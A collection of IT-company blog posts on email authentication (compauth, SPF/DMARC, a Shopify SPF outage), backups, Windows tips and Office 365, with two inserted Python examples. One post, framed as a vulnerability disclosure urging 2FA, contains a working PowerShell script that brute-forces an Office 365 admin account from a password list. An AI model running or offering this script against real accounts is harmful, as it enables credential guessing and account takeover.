What is Get-AntiPhishPolicy TreatSoftPassAsAuthenticated?


While reviewing Get-AntiPhishPolicy I wondered about the TreatSoftPassAsAuthenticated option.

The TreatSoftPassAsAuthenticated parameter specifies whether or not to respect the composite authentication softpass result. Valid values are:

$true: This is the default value.

$false: Only use this value when you want to enable more restrictive antispoofing filtering, because this value might cause false positives.

Note: This parameter corresponds to the Strict filtering value in the Office 365 admin center.

Source: https://docs.microsoft.com/en-us/powershell/module/exchange/advanced-threat-protection/set-antiphishpolicy?view=exchange-ps

This then made me wonder about composite authentication and what a softpass is.

While SPF, DKIM, and DMARC are all useful by themselves, they don’t communicate enough authentication status in the event a message has no explicit authentication records. Therefore, Microsoft has developed an algorithm that combines multiple signals into a single value called Composite Authentication, or compauth for short. Customers in Office 365 have compauth values stamped into the Authentication-Results header in the message headers.

Authentication-Results:  compauth=<fail|pass|softpass|none> reason=<yyy>

CompAuth result: Description
fail: Message failed explicit authentication (sending domain published records explicitly in DNS) or implicit authentication (sending domain did not publish records in DNS, so Office 365 interpolated the result as if it had published records).
pass: Message passed explicit authentication (message passed DMARC, or Best Guess Passed DMARC) or implicit authentication with high confidence (sending domain does not publish email authentication records, but Office 365 has strong backend signals to indicate the message is likely legitimate).
softpass: Message passed implicit authentication with low-to-medium confidence (sending domain does not publish email authentication, but Office 365 has backend signals to indicate the message is legitimate but the strength of the signal is weaker).
none: Message did not authenticate (or it did authenticate but did not align), but composite authentication not applied due to sender reputation or other factors.

Source: https://support.office.com/en-us/article/anti-spoofing-protection-in-office-365-d24bb387-c65d-486e-93e7-06a4f1a436c0

So essentially, a softpass is when there are no DMARC records, but Office 365 is pretty sure that this domain is the appropriate sender. A pass is when either a DMARC record is published and it passes, or Microsoft is very sure the email is legitimate.

By default, softpass is not marked as junk. I agree with this setting, but wish pass would only be for 100% DMARC passes, or that there were an even higher level reserved for 100% DMARC passes, maybe called hardpass. It’s relatively easy to find whether DMARC passed in a message header, so it is not the end of the world, but I’m not a fan of giving the result of algorithmic learning the same level of certainty as a thought-out, intentionally written record.

Do you agree with Microsoft’s default here? Do you think there should be another level of pass?
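Added example (not code from the post or from Microsoft): a small Python parser for the Authentication-Results header shown above that separates the DMARC-backed pass the post would like to call hardpass from an implicit compauth pass, and applies the TreatSoftPassAsAuthenticated choice. The sample headers, addresses and reason codes are constructed.

```python
import re

# Constructed Authentication-Results headers in the Office 365 format. IPs are
# documentation addresses and the reason codes are placeholders, not real ones.
SAMPLES = {
    "dmarc_pass": ("spf=pass (sender IP is 203.0.113.10) smtp.mailfrom=example.com;"
                   " dkim=pass (signature was verified) header.d=example.com;"
                   " dmarc=pass action=none header.from=example.com;"
                   " compauth=pass reason=000"),
    "implicit_pass": ("spf=none (sender IP is 203.0.113.20) smtp.mailfrom=example.net;"
                      " dkim=none (message not signed) header.d=none;"
                      " dmarc=none action=none header.from=example.net;"
                      " compauth=pass reason=000"),
    "softpass": ("spf=none (sender IP is 203.0.113.30) smtp.mailfrom=example.org;"
                 " dkim=none (message not signed) header.d=none;"
                 " dmarc=none action=none header.from=example.org;"
                 " compauth=softpass reason=000"),
    "fail": ("spf=fail (sender IP is 203.0.113.40) smtp.mailfrom=example.com;"
             " dkim=none (message not signed) header.d=none;"
             " dmarc=fail action=quarantine header.from=example.com;"
             " compauth=fail reason=000"),
}
PREFIX = re.compile(r"^\s*Authentication-Results:\s*", re.I)
CLAUSE = re.compile(r"^\s*([a-z]+)=([a-z]+)", re.I)

def parse_auth_results(header):
    """Map each method (spf, dkim, dmarc, compauth) to its result value."""
    results = {}
    for clause in PREFIX.sub("", header).split(";"):
        m = CLAUSE.match(clause)
        if m:
            results[m.group(1).lower()] = m.group(2).lower()
    return results

def classify(header):
    """Return compauth's verdict, but split compauth=pass into two levels:
    'hardpass' when backed by dmarc=pass (a record the sender published)
    and plain 'pass' when it rests on Office 365's backend signals only."""
    r = parse_auth_results(header)
    if r.get("compauth") == "pass" and r.get("dmarc") == "pass":
        return "hardpass"
    return r.get("compauth", "none")

def is_authenticated(header, treat_softpass_as_authenticated=True):
    """Mirror TreatSoftPassAsAuthenticated: $true (the default) respects a
    softpass, $false (strict filtering) treats it as unauthenticated."""
    level = classify(header)
    if level in ("hardpass", "pass"):
        return True
    if level == "softpass":
        return treat_softpass_as_authenticated
    return False
```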

Office 365 Vulnerable to Brute Force Attack via Powershell

Putting this together real quick. Hoping to get some publicity on it because I think it is a major vulnerability.

Today we were auditing a client’s security and discovered that Office 365 will let you brute force them, all day long. Seemingly without restriction.

I notified an Office 365 representative that this was an issue, and their solution was to enable two factor authentication. However, this doesn’t apply to a lot of admin accounts that exist on Office 365.

The process an attacker would use would be to figure out who the IT director is of a major company, put their email address in this script and test against a password list.


# Login to O365
Import-Module MSOnline

# Account you wish to brute force
$username = "admin@microsoft.com"
# Attempt logins using every password in your password list
$x = 0
foreach ($password in Get-Content password_list.txt)
{
    $x = $x + 1
    Write-Host "Attempt #$x"
    Write-Host "Trying password $password"
    $password = $password | ConvertTo-SecureString -AsPlainText -Force
    $O365Cred = New-Object System.Management.Automation.PSCredential($username, $password)
    $O365Session = New-PSSession -ConfigurationName Microsoft.Exchange -ConnectionUri https://ps.outlook.com/powershell -Credential $O365Cred -Authentication Basic -AllowRedirection
    Connect-MsolService -Credential $O365Cred
    # Check a command. If the command has output that means your password is good.
    $Domains = Get-MsolDomain
    if ($Domains) {
        exit
    }
}


It seems Office 365 is not restricting bad login attempts. I’ve been attempting to log in for over 3 hours now and have passed 1000+ passwords. I’ve heard that they will reduce the speed at which you can log in, but that doesn’t seem to be the case based on my data.

Azure Active Directory shows sign-in failures

…and even says “Account is locked because user tried to sign in too many times with an incorrect user ID or password.”, which is not true since I can still log in with that account.

Multifactor authentication does prevent this. When the password is guessed correctly I get a login box which forces 2FA on me. This tells me the password is right, I just need to get access to the user’s device, which is much harder from a distance.

Moral of this story, turn on 2FA for your Office 365 Admin accounts. Microsoft can you please do something about this?

Not Able To Send Email to Hilton.com

Recently Hilton.com made security changes to their email, preventing some domains from being able to send to it. This is a security improvement, but does have consequences for misconfigured email senders. This is likely a misconfiguration of your email. CSSI can work with you to configure your email so it can send to Hilton.com. Give us a call at 869-226-9222 to discuss an email audit for your email.

Hybrid Server Managed Backup Solutions

If a server does not have a backup and crashes, all data could be lost. Even if data could be recovered, data recovery can range from hundreds to thousands of dollars – and include possible downtime of several days or more. The hard drive that stores the data is a moving part that will eventually deteriorate, fail, and require replacement. When this time comes it is very important to have a backup. (Proactive measures can be taken to determine when a drive is failing – which we cover with our Server Monitoring package.)

A backup solution protects from data loss in the event of server failure. A managed backup solution provides monitoring of the backup – confirming it is working as expected. It is very important to monitor the backup solution for failures. It is common for a non-managed backup solution to have an issue and stop backing up, making the backup setup useless.  CSSI’s managed backup solution monitors the backup, confirming the backup is completing and the backup software is working appropriately.

CSSI recommends a hybrid local and cloud backup as this combination offers protection from most types of possible hardware or software failures. After the initial setup, CSSI will manage both the local and cloud backups for you – looking for issues on a daily basis and doing any maintenance necessary.

Local Backup: The local backup provides a complete backup of your server to an external hard drive or local backup server. A local backup has many advantages: Restoring from a local backup is faster than from a cloud backup. Additionally, local backup allows full restoration of an entire server, while a cloud backup typically provides file-level backup. A disadvantage of local backup is that it does not protect from fire or other damages to the hardware. To address this disadvantage, CSSI recommends the local backup drive be rotated out weekly to provide full offsite redundancy for your server. If a fire destroyed the backup drive you could restore the server from the offsite backup drive, but the files would be out of date. This is where cloud backup has advantages.

Cloud Backup: The cloud backup provides a file-level backup of your server to a secure and encrypted cloud storage. Cloud backup protects from physical destruction like tornadoes or fire and has the advantage of always being up-to-date. A disadvantage of cloud backup is that it can’t typically do full server backup – just file level.

Solution – Hybrid Managed Backup Solution (Local and Cloud Backup)

CSSI manages and provides all labor, hardware and software required for multiple levels of backup, protecting the server, the user information on the server, and files.

  • Backup of server including different facets required for server
  • Managed – monitor the daily, weekly, and monthly operations of each backup level
  • All hardware and subscriptions provided and managed by CSSI
  • Multiple level backup AND multiple generation backup
    • Local Backups
      • Backup of everything listed below
      • Rotating hard drives (daily backup, approximately 2-month history kept, rotated onsite)
      • Drive rotated by designated client user (CSSI does all the server and software – client just has to plug in cable periodically)
    • Additional Cloud backups
      • All client data (file shares)
      • Does exclude some server/IT information
      • This additional redundancy is a cloud based backup service with additional daily backup and approximately 3 week history kept
    • Complete CSSI management of the backup process, ongoing audit and checks of backup
    • CSSI availability for support from simple deleted file restore to recovery of an entire server
    • Items to be backed up
      • Server Operating System
      • User database
      • Shared files
      • Server configuration information (also includes IT information and assets like DNS, DHCP, Group Policy and other data as appropriate)

Interested in securing your data? Contact CSSI, in Lexington, Kentucky, and a technician will reach out to you!


How To Get The Name of Your Computer

Here’s how to get your computer name. If you don’t know which version of Windows you are using see How to Tell Which Version of Windows You Are Running.

Windows 10:

  • Right click on the Start button
  • Click System
  • Under Device Name you can find your computer name

Windows 8.1:

  • Right click on the Start button
  • Click System
  • Under Computer name, domain, and workgroup settings, you can find your computer name

Windows 8:

  • Hover the mouse at the top right
  • Click the settings cog > PC info.
  • Under Computer name, domain, and workgroup settings, you can find your computer name

Windows 7:

  • Open System by clicking the Start button.
  • Right-click on Computer, and then click Properties
  • Under Computer name, domain, and workgroup settings, you can find your computer name

Windows Vista:

  • Open System by clicking the Start button.
  • Click Control Panel > System and Maintenance, and then click System.
  • Your Computer Name is listed under Full Computer Name.

Windows XP:

  • Right-Click My Computer and Select Properties
  • Click the Computer Name tab.
  • Your Computer Name is listed under Full Computer Name.

Mac OS X 10.4 and later:

  • Launch your System Preferences.
  • Click on the Sharing pane.
  • Your Computer Name is listed at the top of the pane.

iOS:

  • Launch your Settings app
  • Press General and then press About.
  • Your iOS device name will be at the top left of the screen.

Netgear “ACL is used by Class map or Interface” Error

Just posting this here since Google yielded no results. I was having trouble deleting access lists (for MAC authentication) on a Netgear GS752TP and was getting an error that said “ACL is used by Class map or Interface”. I thought it was because I had a MAC binding, but the MAC Binding Table had no entries. Turns out, I had some class-maps that didn’t clear and weren’t showing, for some reason or another, in the web interface.

The workaround is to go into MAC Binding Configuration and bind the ACL to the port, then unbind it. How can you tell which ports are affected if they don’t show up in the web interface? Telnet to the switch and run show class-map.

This will give you output listing the ports that are bound.

Outlook 2007 Will Continue To Work With Office 365 After October 31, 2017

Microsoft has recently changed the text on their RPC over HTTP End-Of-Life page, which originally claimed it would not allow Outlook 2007 to connect to Office 365. The new text has been updated to say:

RPC over HTTP, also known as Outlook Anywhere, is a legacy method of connectivity and transport between Outlook for Windows and Exchange. In May 2014, Microsoft introduced MAPI over HTTP as a replacement for RPC over HTTP.

Starting on October 31, 2017, RPC over HTTP will no longer be a supported protocol for accessing mail data from Exchange Online. Starting on this date, the following conditions will apply:

  1. Microsoft will not provide support for RPC over HTTP issues (regular or custom).
  2. No code fixes or updates to resolve problems that are unrelated to security will be released.

Additionally, for Office versions that support MAPI over HTTP, Microsoft may elect to override existing registry keys that customers are using in order to force RPC over HTTP use.

Keyword here: support. This essentially means that nothing will happen to users of Outlook 2007 and Office 365, but Microsoft will no longer support the protocol (AKA they won’t support Outlook 2007 connections).

It is still a good idea to move users away from Outlook 2007. We feel any calls to Office 365 with Outlook 2007 running will be met with resistance from the support staff. Additionally, Microsoft may change their stance on this in the future.

Use this Powershell script to check all your tenants for Outlook 2007 connections.


CSSI provides businesses with IT services including Office 365 support and migrations. Contact CSSI for more information on how you can improve your Office 365 infrastructure!

Example of how SonicWall Prevents Ransomware For Businesses

Bad Rabbit Ransomware Automatically Mitigated by SonicWall Capture Advanced Threat Protection

On Tuesday, Oct. 24, a new strain of ransomware named Bad Rabbit appeared in Russia and the Ukraine and spread throughout the day.

SonicWall Capture Labs threat researchers investigated Bad Rabbit and the proficiency of the SonicWall Capture Advanced Threat Protection (ATP) sandboxing service against the previously unknown ransomware. Analyzing three different Bad Rabbit samples, the multi-engine Capture ATP successfully stopped all three attacks.

The SonicWall Capture ATP sandboxing service is designed to provide real-time protection against new strains of malware even before signatures are available on firewalls.

In addition, the SonicWall Capture Labs released signatures to protect customers against Bad Rabbit malware. These signatures are available to SonicWall firewall customers with an active Gateway Security subscription (GAV/IPS) and are applied automatically. More info here.


CSSI is a SonicWall Partner and has many customers with SonicWall firewalls and active security subscriptions. CSSI technicians are trained in SonicWall networking and hold the Certified SonicWall Security Administrator (CSSA) certification. Contact us today to protect your business from ransomware!


Fix For Ctrl Shift V to Move Outlook Emails Stopped Working

Today I ran into a small issue where I couldn’t use ctrl+shift+v to move emails. Instead of giving me the move dialog, I was getting a new email with pasted text in it.

It turns out this was because I recently installed Clipdiary, a clipboard history utility for Windows.

To fix this, go to File – Options – Hot Keys. Put a check next to ‘Win’ on ‘Paste current clipboard contents as plain text’. As you can see, what you are doing is telling Clipdiary not to use Ctrl+Shift+V for pasting the clipboard contents as plain text (stealing the hotkey from Outlook), and to use Win+Ctrl+Shift+V instead.

Shopify breaks email for whole domain

Shopify and Google G Suite broke everything email:

Today we had a client report that ALL internal email from one user to another user was going to the SPAM folder. Our monitoring had caught the issue as well, and we were working on fixing it. So what happened to break all the email? First, the client’s email is hosted by G Suite. After a bit of tracking, we found out that the Shopify SPF record broke everything. How exactly is it possible that Shopify broke the client’s G Suite internal user-to-user email?

SPF and DMARC

Our customer’s SPF record was: “v=spf1 include:shops.shopify.com include:_spf.google.com include:sendgrid.net ~all”  and our DMARC record was: “v=DMARC1; rua=mailto:secretkey@cssi.us; ruf=mailto:secretkey@cssi.us; p=quarantine; sp=none; fo=1;”

Earlier this week (up to yesterday) shops.shopify.com had an SPF record. Today it does not. Earlier this week, all email was working well. Today it is not. So this is what was happening today:

  1. One G Suite user would send email to another internal G Suite user (at the same company and same domain).
  2. The outgoing G Suite server would send it ‘out’ to the incoming G Suite server.
  3. The incoming G Suite server would then receive the email, look up the SPF record.
  4. Then it gets a little more complex – G Suite would “permerror” the entire SPF record lookup, just because one of the includes did not resolve.
  5. The receiving G Suite server would look up the DMARC record, see our quarantine policy, and put the email in the spam folder.

Should G Suite have created a “permerror” and flagged the email (from G Suite mind you) just because one unrelated record (from Shopify) did not look up?  In my opinion NO!  RFC 7208 also has recommendations about ‘void’ lookups (aka RCODE 0 or 3), and the RFC does recommend limiting ‘void’ lookups to TWO before giving a “permerror”.  But it appears that G Suite is limiting to a single ‘void’ lookup before completely giving up and issuing a “permerror”.  Not good in this case!!

Of course the root problem was the Shopify SPF record disappearing, and that record is required for the Internet to receive validated email. But G Suite is still fragile, as demonstrated by being broken so easily. Still annoying that I had to spend a couple of hours on this just to keep email flowing and inform everyone what was going on. Shopify has to fix their problem, but it would be nice if Google updated their code so it does not break G Suite when an external company makes a mistake.


Troubleshooting

We monitor all records and email, which allowed us to catch the records issue quickly – but not before a few internal emails went to spam. Worse, some emails to customers (from G Suite, sendgrid.net and Shopify) were rejected outright – like purchase receipts! This affected all email for the domain; how it was treated depended on the receiving email servers – some put it in Junk, some rejected the email outright.

Especially ironic that internal emails within the same domain were put in the Spam folder.

Temporary Resolution

We removed Shopify from our SPF record and I recommend you do the same. Then we had to set our DMARC record policy to “none”. The first fixed the issue with receiving G Suite email. The second is a fix for Shopify (otherwise those emails would have been sent to spam). So for the moment that domain’s email sending is not as secure as we would like, but we have to wait for Shopify to fix things.
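To trace the failure chain in steps 1 to 5 above and the effect of the temporary resolution, here is an added example (not code from the post, Google or Shopify): a minimal SPF evaluator over a constructed DNS table that applies the include result table of RFC 7208 section 5.2, followed by the DMARC policy disposition. The domain example.com, the IP ranges and the simplified Google and SendGrid records are assumptions.

```python
import ipaddress

# Constructed DNS TXT table (simplified: the real _spf.google.com and
# sendgrid.net records use further includes and other netblocks).
# shops.shopify.com is deliberately absent, mirroring the day its record
# disappeared; example.com stands in for the customer's domain.
DNS_TXT = {
    "example.com": ["v=spf1 include:shops.shopify.com include:_spf.google.com "
                    "include:sendgrid.net ~all"],
    "_spf.google.com": ["v=spf1 ip4:203.0.113.0/24 ~all"],
    "sendgrid.net": ["v=spf1 ip4:198.51.100.0/24 ~all"],
}
RESULT_FOR_QUALIFIER = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}


def check_host(ip, domain, dns):
    """Minimal RFC 7208 check_host() for ip4, include and all; mechanisms are
    evaluated left to right and the first match decides the result."""
    records = [r for r in dns.get(domain, []) if r.startswith("v=spf1 ")]
    if not records:
        return "none"           # domain publishes no SPF record
    if len(records) > 1:
        return "permerror"      # more than one SPF record is an error
    sender = ipaddress.ip_address(ip)
    for term in records[0].split()[1:]:
        qualifier = "+"
        if term[0] in RESULT_FOR_QUALIFIER:
            qualifier, term = term[0], term[1:]
        name, _, arg = term.partition(":")
        if name == "all":
            matched = True
        elif name == "ip4":
            matched = sender in ipaddress.ip_network(arg, strict=False)
        elif name == "include":
            sub = check_host(ip, arg, dns)
            # RFC 7208 section 5.2: an include whose target returns "none"
            # (no SPF record) or permerror makes the whole result permerror,
            # independently of the section 4.6.4 void-lookup limit.
            if sub in ("none", "permerror"):
                return "permerror"
            matched = sub == "pass"
        else:
            return "permerror"  # mechanism not supported by this evaluator
        if matched:
            return RESULT_FOR_QUALIFIER[qualifier]
    return "neutral"            # no mechanism matched

def dmarc_disposition(spf_result, policy):
    """Apply the DMARC p= policy. Only SPF is considered here (the post's
    case has no aligned DKIM signature), so anything but pass is a failure."""
    if spf_result == "pass":
        return "deliver"
    return {"none": "deliver", "quarantine": "spam folder", "reject": "reject"}[policy]

def without_shopify(dns):
    """The post's temporary fix: drop the dead include from the domain's record."""
    fixed = dict(dns)
    fixed["example.com"] = [dns["example.com"][0].replace("include:shops.shopify.com ", "")]
    return fixed
```

With the broken record a G Suite sender gets permerror and p=quarantine sends the mail to spam; with the include removed it passes, while a Shopify sender then softfails, which is why the post also had to drop the policy to none.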

Permanent fix

I guess we have to keep checking the Shopify record and see if it gets fixed. We will check it every day and see when they fix it. (We also opened a ticket with Shopify, which they said got ‘escalated’.)

As for Google – there is no easy way for us to know externally whether they have fixed the void lookup problem, but hopefully they will so this is not such a problem in the future.

Shopify Response

Update: Shopify got back to us and told us it was our fault and said the order of our SPF TXT record elements was wrong. This is nonsense: email receivers evaluate all SPF “include:” entries, regardless of order. SHOPIFY has their SPF record for shops.shopify.com MISSING IN ACTION and they need to put it back or everything will remain broken.

Why are some large companies that rely on email as a core part of their business so clueless about what is these days just basic functionality?